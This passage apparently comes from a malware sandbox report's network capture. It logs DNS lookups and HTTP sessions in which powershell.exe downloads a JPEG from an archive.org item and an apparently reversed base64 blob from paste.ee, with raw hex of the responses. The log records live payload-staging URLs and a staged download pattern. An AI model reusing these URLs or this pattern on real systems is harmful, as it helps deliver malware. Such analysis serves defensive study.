                                        Oct 10, 2024 09:29:06.665553093 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.665592909 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.665625095 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.665642977 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.665666103 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.665699005 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.665735006 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.665749073 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.665755033 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.665785074 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.666508913 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.666560888 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.666564941 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.666577101 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.666610956 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.666625023 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.666631937 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.666654110 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.666680098 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.667356014 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.667397022 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.667433023 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.667438030 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.667448044 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.667474031 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.667486906 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.667493105 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.667526960 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.668334961 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.668385983 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.668392897 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.668414116 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.668443918 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.668484926 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.668492079 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.668515921 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.668549061 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.694545031 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.694598913 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.694643021 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.694684029 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.694839954 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.694892883 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.694905043 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.694947958 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.695348024 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.695432901 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.696187973 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.696206093 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.696237087 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.696237087 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.696248055 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.696280003 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.696315050 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.696926117 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.696942091 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.697007895 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.697016001 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.697056055 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.736941099 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.736962080 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.737036943 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.737046957 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.737091064 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.758074045 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.758091927 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.758228064 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.758238077 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.758282900 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.758690119 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.758706093 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.758759975 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.758774042 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.758815050 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.759116888 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.759133101 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.759211063 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.759219885 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.759262085 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.787154913 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787188053 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787264109 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.787282944 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787326097 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.787764072 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787784100 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787832975 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787841082 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.787848949 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.787877083 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.787909985 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.787914038 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.788439035 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.788455963 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.788508892 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.788517952 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.788862944 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.788929939 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.788937092 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.788969040 CEST44349708188.114.96.3192.168.2.8
                                        Oct 10, 2024 09:29:06.789011955 CEST49708443192.168.2.8188.114.96.3
                                        Oct 10, 2024 09:29:06.789381027 CEST49708443192.168.2.8188.114.96.3
                                        TimestampSource PortDest PortSource IPDest IP
                                        Oct 10, 2024 09:28:59.312402964 CEST5022753192.168.2.81.1.1.1
                                        Oct 10, 2024 09:28:59.562841892 CEST53502271.1.1.1192.168.2.8
                                        Oct 10, 2024 09:29:05.299503088 CEST5246453192.168.2.81.1.1.1
                                        Oct 10, 2024 09:29:05.306782961 CEST53524641.1.1.1192.168.2.8
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Oct 10, 2024 09:28:59.312402964 CEST192.168.2.81.1.1.10x3f0aStandard query (0)ia600102.us.archive.orgA (IP address)IN (0x0001)false
                                        Oct 10, 2024 09:29:05.299503088 CEST192.168.2.81.1.1.10xb30aStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Oct 10, 2024 09:28:59.562841892 CEST1.1.1.1192.168.2.80x3f0aNo error (0)ia600102.us.archive.org207.241.227.242A (IP address)IN (0x0001)false
                                        Oct 10, 2024 09:29:05.306782961 CEST1.1.1.1192.168.2.80xb30aNo error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                        Oct 10, 2024 09:29:05.306782961 CEST1.1.1.1192.168.2.80xb30aNo error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                        • ia600102.us.archive.org
                                        • paste.ee
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.849706207.241.227.2424438004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-10 07:29:00 UTC117OUTGET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                        Host: ia600102.us.archive.org
                                        Connection: Keep-Alive
                                        2024-10-10 07:29:00 UTC591INHTTP/1.1 200 OK
                                        Server: nginx/1.24.0 (Ubuntu)
                                        Date: Thu, 10 Oct 2024 07:29:00 GMT
                                        Content-Type: image/jpeg
                                        Content-Length: 6331693
                                        Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                        Connection: close
                                        ETag: "6704abca-609d2d"
                                        Strict-Transport-Security: max-age=15724800
                                        Expires: Thu, 10 Oct 2024 13:29:00 GMT
                                        Cache-Control: max-age=21600
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                        Access-Control-Allow-Credentials: true
                                        Accept-Ranges: bytes
                                        2024-10-10 07:29:00 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                        2024-10-10 07:29:00 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                        Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                        2024-10-10 07:29:00 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                        Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                        2024-10-10 07:29:00 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                        Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                        2024-10-10 07:29:00 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                        Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                        2024-10-10 07:29:00 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                        Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                        2024-10-10 07:29:00 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                        Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                        2024-10-10 07:29:00 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                        Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                        2024-10-10 07:29:00 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                        Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                        2024-10-10 07:29:00 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                        Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.849708188.114.96.34438004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-10 07:29:05 UTC67OUTGET /d/A2fG2/0 HTTP/1.1
                                        Host: paste.ee
                                        Connection: Keep-Alive
                                        2024-10-10 07:29:06 UTC1232INHTTP/1.1 200 OK
                                        Date: Thu, 10 Oct 2024 07:29:06 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=2592000
                                        strict-transport-security: max-age=63072000
                                        x-frame-options: DENY
                                        x-content-type-options: nosniff
                                        x-xss-protection: 1; mode=block
                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                        cf-cache-status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PTYcQMSa9mHfRv7Q9cDwaHi1R%2FNV1yYKIrHL11nrM6p37hhMuQFQq4oTKVkLZjyrUazy8TFM08DqtjTD2vm93NRJaqYNQHm2%2F4YWSgIOycQ9329d4QbusRPOEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8d04e5bc7e5e5e65-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-10-10 07:29:06 UTC137INData Raw: 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                        Data Ascii: f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
